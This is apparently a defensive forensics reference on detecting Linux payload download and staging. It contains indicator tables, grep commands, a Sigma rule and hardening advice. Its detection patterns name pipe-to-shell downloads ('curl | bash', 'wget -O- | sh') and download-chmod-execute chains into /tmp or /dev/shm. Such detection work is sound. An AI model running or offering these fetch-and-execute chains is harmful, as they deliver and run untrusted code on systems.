This note documents detection patterns related to Payload Download and Staging on Linux systems.
Direct Indicators
| Source | Grep Pattern / Artifact | Meaning | Forensic Value | Notes |
|---|---|---|---|---|
| Shell history | curl http | Remote payload retrieval | Critical | Very common first-stage delivery. |
| Shell history | wget http | Remote payload retrieval | Critical | Common operator behavior. |
| Shell history | curl -O | File downloaded directly | High | Often leaves staged binary locally. |
| Shell history | wget -O | Explicit output file chosen | Critical | Often reveals attacker naming. |
| Shell history | `curl | bash` | Inline remote execution | Critical |
| Shell history | `wget -O- | sh` | Streamed execution | Critical |
| Shell history | chmod +x | Payload prepared for execution | Critical | Strong staging continuation. |
| Shell history | ./payload | Local staged binary executed | Critical | Direct post-download execution. |
| Shell history | base64 -d | Payload decoded locally | High | Common obfuscation step. |
| Shell history | tar, unzip | Archive extraction | High | Multi-file staging. |
auditd | execve of curl/wget/chmod | Process-level staging evidence | Critical | Best attribution if enabled. |
| File timestamps | new file in temp dirs | Payload materialized | Critical | Strong timeline anchor. |
| Network telemetry | outbound HTTP/HTTPS fetch | Retrieval confirmed | Critical | Supports command evidence. |
journalctl | downloader invocation | Journald process evidence | High | Depends on logging setup. |
| EDR telemetry | downloader → shell/binary chain | Execution lineage | Critical | Strong staged compromise indicator. |
Indirect Indicators
| Indicator | What To Look For | Forensic Value | Notes |
|---|---|---|---|
| Download immediately after SSH login | Manual operator staging | Critical | Common foothold progression. |
Download into /tmp | Disposable payload placement | Critical | Highly common attacker pattern. |
Download into /dev/shm | Memory-backed stealth staging | Critical | Higher stealth intent. |
| Download then chmod then execute | Full attacker chain | Critical | Very high confidence malicious sequence. |
| Renamed payload to service-like name | Camouflage | High | Common stealth behavior. |
| Hidden file staging | .cache, .sys, dot-prefixed names | High | Evasion attempt. |
| Download followed by reverse shell | Stage-to-shell chain | Critical | Strong intrusion evidence. |
| Download from raw IP | Direct operator infra | High | Often suspicious. |
| Download from paste/raw services | Scripted staging | High | Common attacker convenience. |
| Archive then extraction then service install | Multi-stage persistence | Critical | Advanced staging path. |
Common Tools
| Tool | Usage |
|---|---|
curl | Primary payload retrieval utility. |
wget | Common alternative retriever. |
scp | File transfer from attacker host. |
base64 | Encoded payload transport. |
tar / unzip | Multi-file extraction. |
chmod | Execution preparation. |
python -m http.server | Common attacker-hosted simple delivery source. |
Relevant Artifacts
| Artifact | Path / Command | Forensic Value | Notes |
|---|---|---|---|
| Shell history | .bash_history, .zsh_history | Critical | Primary staging evidence. |
| Temp directories | /tmp, /var/tmp, /dev/shm | Critical | Primary payload locations. |
| Audit logs | /var/log/audit/audit.log | Critical | Process attribution. |
| Network logs | proxy/firewall/netflow | Critical | Download confirmation. |
| File metadata | stat | Critical | Creation timeline. |
| Journald | journalctl | High | Process clues. |
| Extracted archives | temp dirs / home dirs | High | Secondary stage content. |
| Web roots | /var/www, app dirs | High | Download may originate from web foothold. |
MITRE ATT&CK References
- T1105 Ingress Tool Transfer
- T1059 Command and Scripting Interpreter
- T1027 Obfuscated Files or Information
Decision Tree
-
Was remote retrieval executed?
- Identify curl, wget, scp, base64 activity.
-
Where was payload written?
- Determine temp, home, service path.
-
Was payload made executable?
- Check chmod and file mode changes.
-
Was payload executed?
- Shell history, auditd, process traces.
-
Was staging followed by persistence?
- Inspect cron, services, keys, users.
-
Pivot
- Download source → operator infra.
- File path → execution chain.
- Timestamp → correlate with access event.
-
Confirm staging
- Downloader + file creation + chmod + execution = strong payload staging.
Example Detection Templates
Grep
grep -R "curl http\|wget http\|curl -O\|wget -O\|curl | bash\|wget -O-" /home /root /tmp /var/tmp 2>/dev/null
grep -R "chmod +x\|base64 -d\|tar \|unzip " /home /root /tmp /var/tmp 2>/dev/null
grep -R "curl\|wget" /home/*/.bash_history /root/.bash_history 2>/dev/null
Journalctl
journalctl | grep -E "curl|wget|chmod|base64"
File Inspection
find /tmp /var/tmp /dev/shm -type f -printf '%TY-%Tm-%Td %TT %p\n' 2>/dev/null | sort
find /tmp /var/tmp /dev/shm -perm /111 -type f 2>/dev/null
Sigma
title: Linux Payload Download and Staging
id: linux-payload-download-staging
status: experimental
description: Detects payload retrieval and local staging behavior on Linux systems
logsource:
product: linux
detection:
selection_keywords:
message|contains:
- 'curl'
- 'wget'
- 'chmod +x'
- 'base64 -d'
condition: selection_keywords
fields:
- message
- hostname
falsepositives:
- Legitimate package retrieval
level: high
tags:
- attack.command_and_control
- attack.t1105
Mitigation & Hardening
| Control Area | Mitigation | Effectiveness | Notes |
|---|---|---|---|
| Egress filtering | Restrict arbitrary outbound HTTP/HTTPS | Critical | Stops many delivery paths. |
| Temp execution control | Limit execution from temp dirs | Critical | High-value prevention. |
| Auditd | Monitor downloader and chmod execution | High | Strong process visibility. |
| Proxy controls | Force authenticated outbound retrieval | High | Improves attribution. |
| File monitoring | Watch temp directories for executables | High | Strong invariant detection. |
| Least privilege | Restrict service account shell utility access | High | Reduces staging options. |
Fast Triage Checks
| Question | Command / Artifact | Why It Matters |
|---|---|---|
| Was payload downloaded? | grep curl/wget | Establish delivery. |
| Where is payload now? | inspect temp dirs | Locate executable. |
| Was it made executable? | find executable temp files | Detect staging completion. |
| Was it executed? | shell history / auditd | Confirm compromise progression. |
| Was source external suspicious? | inspect URL/IP | Infra clue. |
| Did persistence follow? | inspect cron/services/keys | Stabilization evidence. |
High Value Grep Strings
| Pattern | Why It Matters |
|---|---|
curl http | Direct remote retrieval. |
wget http | Direct remote retrieval. |
curl -O | File output staging. |
wget -O | Explicit output naming. |
| `curl | bash` |
wget -O- | Stream execution. |
chmod +x | Execution preparation. |
base64 -d | Decoding staged content. |
tar | Archive extraction. |
unzip | Archive extraction. |
Analyst Notes
| Scenario | Interpretation |
|---|---|
| Curl + chmod + execute | Very strong malicious staging chain. |
Download into /dev/shm | Higher stealth intent. |
| Payload named like service | Camouflage likely. |
| Download then reverse shell | Stage-to-operator progression. |
| Downloader without file left | Inline execution likely. |
| Base64 decode before execute | Obfuscation present. |